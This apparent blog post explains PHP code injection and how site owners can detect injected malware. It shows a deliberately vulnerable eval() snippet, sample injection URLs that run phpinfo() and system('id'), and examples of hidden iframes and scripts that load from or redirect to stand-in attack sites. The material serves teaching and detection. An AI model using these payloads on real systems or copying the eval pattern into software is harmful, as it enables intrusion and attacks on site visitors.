How to detect code injection attack

0
code injection attack

Code injection is also known as PHP code injection. Code injection attack is an exploitation technique where a computer bug is exploited by injecting code into an application which is then executed by application itself.

PHP code injection attacks are generally performed by injecting a PHP code into the PHP based vulnerable application. The attacks are generally possible because of the improper handling of the input data or improper input validation.

A general misconception is about code injection and command injection being same. These are two different things. An attacker exploiting PHP code injections vulnerability could only perform what a PHP can perform, but with command injection he could leverage it to the system commands.

Injection is used by an attacker to introduce (or “inject“) code into a vulnerable computer program and change the course of execution.

These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:

  • allowed characters
  • data format
  • amount of expected data

Code Injection differs from Command Injection in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, he is only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.

Risk Factors

  • These types of vulnerabilities can range from very hard to find, to easy to find
  • If found, are usually moderately hard to exploit, depending of scenario
  • If successfully exploited, impact could cover loss of confidentiality, loss of integrity, loss of availability, and/or loss of accountability

Example

When a developer uses the PHP eval() function and passes it un-trusted data that an attacker can modify, code injection could be possible.

The example below shows a dangerous way to use the eval() function:

$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");

As there is no input validation, the code above is vulnerable to a Code Injection attack.

For example:

/index.php?arg=1; phpinfo()

While exploiting bugs like these, an attacker may want to execute system commands. In this case, a code injection bug can also be used for command injection, for example:

/index.php?arg=1; system('id')

What does it mean to have pages marked with malware infection type “Code injection” in Google Search Console?

This means that pages on your site were modified to include malicious code, such as an iframe to a malware attack site.

Avoid using a browser to view infected pages on your site. Because malware often spreads by exploiting browser vulnerabilities, opening an infected malware page in a browser may damage your computer.

Log in to your filesystem. Investigate all resources that write to the “code injection” infected URLs. Some examples of malicious code injections the following:

    • iframe to an attack site
<iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
  style="display:none" width="0"></iframe>
    • JavaScript or another scripting language that calls and runs scripts from an attack site
<script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
    • Scripting that redirects the browser to an attack site
<script>
  if (document.referrer.match(/google\.com/)) {
    window.location("http://malware-attack-site/");
  }
</script>

Investigate all possible harmful code present on the site. It may be helpful to search for words like [iframe] to find iframe code. Other helpful keywords are “script”, “eval”, and “unescape”.

See also how to hack website with SQL Injection.

Leave a Reply